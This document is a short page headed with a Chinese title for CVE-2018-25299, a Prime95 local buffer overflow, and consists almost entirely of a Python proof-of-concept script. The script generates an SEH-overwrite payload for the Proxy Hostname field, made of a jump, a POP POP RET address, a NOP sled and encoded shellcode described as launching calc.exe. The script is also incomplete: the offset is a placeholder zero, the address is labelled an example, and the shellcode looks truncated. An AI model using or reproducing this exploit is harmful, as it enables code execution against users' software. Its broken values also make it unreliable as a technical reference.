CVE-2018-25299 Prime95本地缓冲区溢出漏洞

#!/usr/bin/env python3 # PoC for CVE-2018-25299 Prime95 Buffer Overflow # This script generates a malicious payload to trigger the SEH overflow via the Proxy Hostname field. import struct # Offset to overwrite SEH handler (Example offset, requires debugging) offset = 0 seh_handler = b"\xeb\x06\x90\x90" # Short jump + NOPs seh_address = struct.pack("<L", 0x10010423) # Address of POP POP RET (Example address) nop_sled = b"\x90" * 32 # Shellcode (calc.exe example) shellcode = b"\xd9\xc3\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" payload = b"A" * offset + seh_handler + seh_address + nop_sled + shellcode print("[+] Generating malicious payload for Proxy Hostname field...") print("[+] Payload Length:", len(payload)) print("[+] Payload:", payload.decode('latin-1'))